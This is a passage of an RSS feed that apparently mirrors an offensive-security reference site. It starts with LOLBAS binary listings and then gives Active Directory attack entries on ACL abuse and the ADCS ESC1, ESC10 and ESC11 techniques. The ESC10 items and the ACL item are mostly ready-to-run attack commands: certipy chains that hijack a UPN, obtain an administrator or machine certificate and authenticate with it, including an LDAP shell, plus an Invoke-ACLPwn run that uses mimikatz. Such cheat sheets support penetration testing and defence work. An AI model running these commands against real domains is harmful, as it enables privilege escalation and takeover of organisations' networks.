-0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/winfile/</guid><description/></item><item><title>winget.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/winget/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/winget/</guid><description/></item><item><title>WinProj.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/winproj/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/winproj/</guid><description/></item><item><title>winrm.vbs</title><link>https://bokkapig.pages.dev/refs/lolbas/winrm/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/winrm/</guid><description/></item><item><title>Winword.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/winword/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/winword/</guid><description/></item><item><title>Wlrmdr.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wlrmdr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wlrmdr/</guid><description/></item><item><title>Wmic.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wmic/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wmic/</guid><description/></item><item><title>WorkFolders.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/workfolders/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/workfolders/</guid><description/></item><item><title>write.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/write/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/write/</guid><description/></item><item><title>wsb.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wsb/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wsb/</guid><description/></item><item><title>Wscript.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wscript/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wscript/</guid><description/></item><item><title>Wsl.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wsl/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wsl/</guid><description/></item><item><title>Wsreset.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wsreset/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wsreset/</guid><description/></item><item><title>wt.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wt/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wt/</guid><description/></item><item><title>wuauclt.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wuauclt/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wuauclt/</guid><description/></item><item><title>XBootMgr.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/xbootmgr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/xbootmgr/</guid><description/></item><item><title>XBootMgrSleep.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/xbootmgrsleep/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/xbootmgrsleep/</guid><description/></item><item><title>xsd.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/xsd/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/xsd/</guid><description/></item><item><title>Xwizard.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/xwizard/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/xwizard/</guid><description/></item><item><title>Zipfldr.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/zipfldr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/zipfldr/</guid><description/></item><item><title>Active Directory - Access Controls ACL/ACE</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-acl-ace/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-acl-ace/</guid><description>&lt;p&gt;An &lt;strong&gt;Access Control Entry (ACE)&lt;/strong&gt; is a specific permission granted or denied to a user or group for a particular resource, such as a file or directory. Each ACE defines the type of access allowed (e.g., read, write, execute) or denied.&lt;/p&gt;
&lt;p&gt;An &lt;strong&gt;Access Control List (ACL)&lt;/strong&gt; is a collection of Access Control Entries (ACEs) associated with a resource.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Check ACL for an User with &lt;a href="https://github.com/canix1/ADACLScanner"&gt;ADACLScanner&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ADACLScan&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt; &lt;span class="n"&gt;-Base&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;DC=contoso;DC=com&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Filter&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;(&amp;amp;(AdminCount=1))&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Scope&lt;/span&gt; &lt;span class="n"&gt;subtree&lt;/span&gt; &lt;span class="n"&gt;-EffectiveRightsPrincipal&lt;/span&gt; &lt;span class="n"&gt;User1&lt;/span&gt; &lt;span class="n"&gt;-Output&lt;/span&gt; &lt;span class="n"&gt;HTML&lt;/span&gt; &lt;span class="n"&gt;-Show&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;Automate ACL exploit &lt;a href="https://github.com/fox-it/Invoke-ACLPwn"&gt;Invoke-ACLPwn&lt;/a&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;Invoke-ACL&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt; &lt;span class="n"&gt;-SharpHoundLocation&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;sharphound&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-mimiKatzLocation&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-Username&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;user1&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-Domain&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;domain.local&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-Password&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Welcome01!&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="genericallgenericwrite" class="anchored-heading"&gt;GenericAll/GenericWrite&lt;a class="heading-anchor" href="#genericallgenericwrite" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="usercomputer" class="anchored-heading"&gt;User/Computer&lt;a class="heading-anchor" href="#usercomputer" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;We can set a &lt;strong&gt;SPN&lt;/strong&gt; on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it.&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC Attacks</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc/</guid><description>&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc01/"&gt;ESC1 - Misconfigured Certificate Templates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc02/"&gt;ESC2 - Misconfigured Certificate Templates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc03/"&gt;ESC3 - Misconfigured Enrollment Agent Templates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc04/"&gt;ESC4 - Access Control Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc05/"&gt;ESC5 - Vulnerable PKI Object Access Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc06/"&gt;ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc07/"&gt;ESC7 - Vulnerable Certificate Authority Access Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc08/"&gt;ESC8 - Web Enrollment Relay&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc09/"&gt;ESC9 - No Security Extension&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc10/"&gt;ESC10 - Weak Certificate Mapping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc11/"&gt;ESC11 - Relaying NTLM to ICPR&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc12/"&gt;ESC12 - ADCS CA on YubiHSM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc13/"&gt;ESC13 - Issuance Policy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc14/"&gt;ESC14 - altSecurityIdentities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc15/"&gt;ESC15 - EKUwu Application Policies - CVE-2024-49019&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Active Directory - Certificate ESC1</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc01/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc01/</guid><description>&lt;h2 id="esc1---misconfigured-certificate-templates" class="anchored-heading"&gt;ESC1 - Misconfigured Certificate Templates&lt;a class="heading-anchor" href="#esc1---misconfigured-certificate-templates" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Domain Users can enroll in the &lt;strong&gt;VulnTemplate&lt;/strong&gt; template, which can be used for client authentication and has &lt;strong&gt;ENROLLEE_SUPPLIES_SUBJECT&lt;/strong&gt; set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Template that allows for AD authentication&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ENROLLEE_SUPPLIES_SUBJECT&lt;/strong&gt; flag&lt;/li&gt;
&lt;li&gt;[PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC10</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc10/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc10/</guid><description>&lt;h2 id="esc10--weak-certificate-mapping---strongcertificatebindingenforcement" class="anchored-heading"&gt;ESC10 – Weak Certificate Mapping - StrongCertificateBindingEnforcement&lt;a class="heading-anchor" href="#esc10--weak-certificate-mapping---strongcertificatebindingenforcement" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;StrongCertificateBindingEnforcement&lt;/code&gt; = 0.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploit&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# get user hash with shadowcredentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;shadow&lt;/span&gt; &lt;span class="n"&gt;auto&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-account&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# change user UPN&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;account&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-upn&lt;/span&gt; &lt;span class="n"&gt;administrator&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# ask for certificate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;admin@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-hashes&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;hashes&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-target&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;10.10.10.10&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-ca&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DOMAIN-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;user&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-debug&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Rollback upn modification&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;account&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-upn&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Connect with the certificate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;auth&lt;/span&gt; &lt;span class="n"&gt;-pfx&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;administrator.pfx&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-domain&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="esc10--weak-certificate-mapping---certificatemappingmethods" class="anchored-heading"&gt;ESC10 – Weak Certificate Mapping - CertificateMappingMethods&lt;a class="heading-anchor" href="#esc10--weak-certificate-mapping---certificatemappingmethods" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;CertificateMappingMethods&lt;/code&gt; = 0x04.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploit&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;shadow&lt;/span&gt; &lt;span class="n"&gt;auto&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-account&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# change user UPN to computer$&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;account&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-upn&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;computer$@domain.local&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# ask for certificate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;admin@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-hashes&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;3b60abbc25770511334b3829866b08f1&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-target&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;10.10.10.10&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-ca&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DOMAIN-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;user&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-debug&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Rollback upn modification&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;account&lt;/span&gt; &lt;span class="n"&gt;update&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;user@domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;password&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-user&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-upn&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Connect via schannel with the certificate &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;auth&lt;/span&gt; &lt;span class="n"&gt;-pfx&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;computer.pfx&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-domain&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;domain.local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-ldap-shell&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://mayfly277.github.io/posts/ADCS-part14/"&gt;GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Active Directory - Certificate ESC11</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc11/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc11/</guid><description>&lt;h2 id="esc11---relaying-ntlm-to-icpr" class="anchored-heading"&gt;ESC11 - Relaying NTLM to ICPR&lt;a class="heading-anchor" href="#esc11---relaying-ntlm-to-icpr" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Encryption is not enforced for ICPR requests and Request Disposition is set to Issue.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Tools&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/ly4k/Certipy"&gt;ly4k/Certipy&lt;/a&gt; - Certipy official&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/sploutchy/Certipy"&gt;sploutchy/Certipy&lt;/a&gt; - Certipy fork&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/sploutchy/impacket"&gt;sploutchy/impacket&lt;/a&gt; - Impacket fork&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Look for &lt;code&gt;Enforce Encryption for Requests: Disabled&lt;/code&gt; in certipy output.&lt;/p&gt;
